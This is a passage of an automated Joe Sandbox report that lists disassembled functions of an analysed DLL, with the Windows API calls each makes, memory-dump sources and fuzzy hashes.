                                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB504B
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB5058
                                                                                                                                        • Part of subcall function 69EAF489: __CxxThrowException@8.LIBCMT ref: 69EAF49F
                                                                                                                                      • _memset.LIBCMT ref: 69EB5077
                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,69E8A83E,?,?,69E8A96D), ref: 69EB5088
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB50A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 356813703-0
                                                                                                                                      • Opcode ID: e31cec6924f084cccdb87330685a656bf53f20ca2fd213d85d8780eab16adf63
                                                                                                                                      • Instruction ID: b77371e3d151b650dfee37e1757f7fc1a71dd6b855293e2513ca2f26cd0fcb53
                                                                                                                                      • Opcode Fuzzy Hash: e31cec6924f084cccdb87330685a656bf53f20ca2fd213d85d8780eab16adf63
                                                                                                                                      • Instruction Fuzzy Hash: 3A110BB4500206EFCB05EF64CE84D6EBBB4FF06324720C42CE8968A220CB30AD14CB90
                                                                                                                                      Function 69E81AF0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-85274317
                                                                                                                                      • Opcode ID: 72c76ec850e1e5827b3fa2a861e7f5fec77ee7c7fddf6796b16ca15e54106726
                                                                                                                                      • Instruction ID: f9940b54e28f06fd5198377eed5a1f4c40861b7fe6b49d1c15317d8d3af90ad5
                                                                                                                                      • Opcode Fuzzy Hash: 72c76ec850e1e5827b3fa2a861e7f5fec77ee7c7fddf6796b16ca15e54106726
                                                                                                                                      • Instruction Fuzzy Hash: B9012B36904222AFE300D6E85E18FAF7B985FC5384F749D4AF8989B214FA75D508C3D1
                                                                                                                                      Function 69E81CA0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-85274317
                                                                                                                                      • Opcode ID: 53cbf64275947329dcde7ecffbb473f9982fa3e8f60c578312408eb0a28ccaaa
                                                                                                                                      • Instruction ID: ef1b5ca326ece29d2c1869ca10b811f0da15f0104d4afbb1a361ec388f123dca
                                                                                                                                      • Opcode Fuzzy Hash: 53cbf64275947329dcde7ecffbb473f9982fa3e8f60c578312408eb0a28ccaaa
                                                                                                                                      • Instruction Fuzzy Hash: 40017B32E041212BD300D6E85E08FAF7BD49FC5349F75C906F8A8AB240EB34E50883D2
                                                                                                                                      Function 69EBBCE2 Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 69EBBCF0
                                                                                                                                      • GetSysColor.USER32(00000010), ref: 69EBBCF7
                                                                                                                                      • GetSysColor.USER32(00000014), ref: 69EBBCFE
                                                                                                                                      • GetSysColor.USER32(00000012), ref: 69EBBD05
                                                                                                                                      • GetSysColor.USER32(00000006), ref: 69EBBD0C
                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 69EBBD19
                                                                                                                                      • GetSysColorBrush.USER32(00000006), ref: 69EBBD20
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Color$Brush
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2798902688-0
                                                                                                                                      • Opcode ID: cbf9ff853b1d5ec1ffa114d04b335cddb153e6af6f399a61ef63ada2860a1406
                                                                                                                                      • Instruction ID: 17e82c424ed86f4eefadc96807e7b5789875f52e15cadd0b0164d7708d8528b2
                                                                                                                                      • Opcode Fuzzy Hash: cbf9ff853b1d5ec1ffa114d04b335cddb153e6af6f399a61ef63ada2860a1406
                                                                                                                                      • Instruction Fuzzy Hash: A0F09E719407445BD730BBB65D49B47BAD5EFC4720F12092AD2458B990D6B5E441DF40
                                                                                                                                      Function 69E8C400 Relevance: 9.2, APIs: 6, Instructions: 235synchronizationCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E8C430
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E8C45C
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,69E8A83E,?,?,69E8A96D), ref: 69E8C46C
                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,00000000,00000000,?,?,?,00000000,69E8A83E,?,?,69E8A96D), ref: 69E8C522
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateCreateEventHeapObjectSingleWait_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 833579502-0
                                                                                                                                      • Opcode ID: 412f6a0b373f55c687c925b9511ac256b857b0ccfb112d1350c5cf8ce1590486
                                                                                                                                      • Instruction ID: 03c36c3e517bfbf6fa5bc818255aea19704b233249003bbe9430f07b28eab41a
                                                                                                                                      • Opcode Fuzzy Hash: 412f6a0b373f55c687c925b9511ac256b857b0ccfb112d1350c5cf8ce1590486
                                                                                                                                      • Instruction Fuzzy Hash: 5D81F0713046019FD704CB68CA81B6677E4FF86328F24876CE45ACB390EB34E9058B90
                                                                                                                                      Function 69EB2D4F Relevance: 9.1, APIs: 6, Instructions: 147networkstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InternetCanonicalizeUrlA.WININET(00000825,?,00000824,?), ref: 69EB2DFF
                                                                                                                                      • GetLastError.KERNEL32(?,00000825,?), ref: 69EB2E05
                                                                                                                                      • InternetCanonicalizeUrlA.WININET(?,00000000,00000824,?), ref: 69EB2E3F
                                                                                                                                      • InternetCrackUrlA.WININET(?,00000000,?,02000000), ref: 69EB2E7D
                                                                                                                                      • UrlUnescapeA.SHLWAPI(?,00000000,00000000,02100000,?,00000825,?), ref: 69EB2E9B
                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000825,?), ref: 69EB2EB3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$Canonicalize$CrackErrorLastUnescapelstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2961774178-0
                                                                                                                                      • Opcode ID: 10084ee57639c0acd91464fde4c016a33f4c65576f2906b0ef5a655f41b989f7
                                                                                                                                      • Instruction ID: 9b2f7c661ade90434ac0839899f2d3c53ab70c72ed8784be8c69d4b40b4bf6a4
                                                                                                                                      • Opcode Fuzzy Hash: 10084ee57639c0acd91464fde4c016a33f4c65576f2906b0ef5a655f41b989f7
                                                                                                                                      • Instruction Fuzzy Hash: 8B518D71815219CBDF229F25CE8079A7BF4FF65744F208199E859AE308DB719A82CFD0
                                                                                                                                      Function 69E9D870 Relevance: 9.1, APIs: 6, Instructions: 130processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9D8F4
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 69E9D906
                                                                                                                                      • Module32First.KERNEL32 ref: 69E9D920
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 69E9D979
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9D983
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?), ref: 69E9D9D7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandleModule32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2655431330-0
                                                                                                                                      • Opcode ID: 90ae047c37ed9dc5e0d8a7f85eafbdf593a0a26819e4793d805849043e694661
                                                                                                                                      • Instruction ID: b527a9d8f1f36a141fdfeffe0ae692bb6d2846c2515409ecb47b6f294513a1f5
                                                                                                                                      • Opcode Fuzzy Hash: 90ae047c37ed9dc5e0d8a7f85eafbdf593a0a26819e4793d805849043e694661
                                                                                                                                      • Instruction Fuzzy Hash: 4541D2751046419FD310DF68CC84A6FB7E9FFC9328F208A2DF46987290DB34994ACB92
                                                                                                                                      Function 69EB21E5 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 69EB2218
                                                                                                                                      • GetParent.USER32(?), ref: 69EB2226
                                                                                                                                      • GetParent.USER32(?), ref: 69EB2239
                                                                                                                                      • GetLastActivePopup.USER32(?), ref: 69EB224A
                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 69EB225E
                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 69EB2271
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 670545878-0
                                                                                                                                      • Opcode ID: 52dbb7a0f501fbb1c45ad22cac0f0a2803e46b8d1445135a6ebfd6c27b724fc1
                                                                                                                                      • Instruction ID: 9a5ca4cba0aa7e9fa2c605c07e0f484829b00b1fd1f932865d66209c20c9fe49
                                                                                                                                      • Opcode Fuzzy Hash: 52dbb7a0f501fbb1c45ad22cac0f0a2803e46b8d1445135a6ebfd6c27b724fc1
                                                                                                                                      • Instruction Fuzzy Hash: 0611E3329456216BDF120A699B45B5E72A87FBEB69F214224ED14EF30CDB30CD0382D0
                                                                                                                                      Function 69E88820 Relevance: 9.1, APIs: 6, Instructions: 64networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cleanup$Startup__strlwr_memsetgethostname
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1390831569-0
                                                                                                                                      • Opcode ID: ac0890264d2238cabf6a0e6e604e6e9a71c7d2914df5db67f1d2a4a71215d07e
                                                                                                                                      • Instruction ID: fd50974fbfdfbc98c7c4d0dbbce7ac9847b5c6554adbc56a80655e7d9b3f768f
                                                                                                                                      • Opcode Fuzzy Hash: ac0890264d2238cabf6a0e6e604e6e9a71c7d2914df5db67f1d2a4a71215d07e
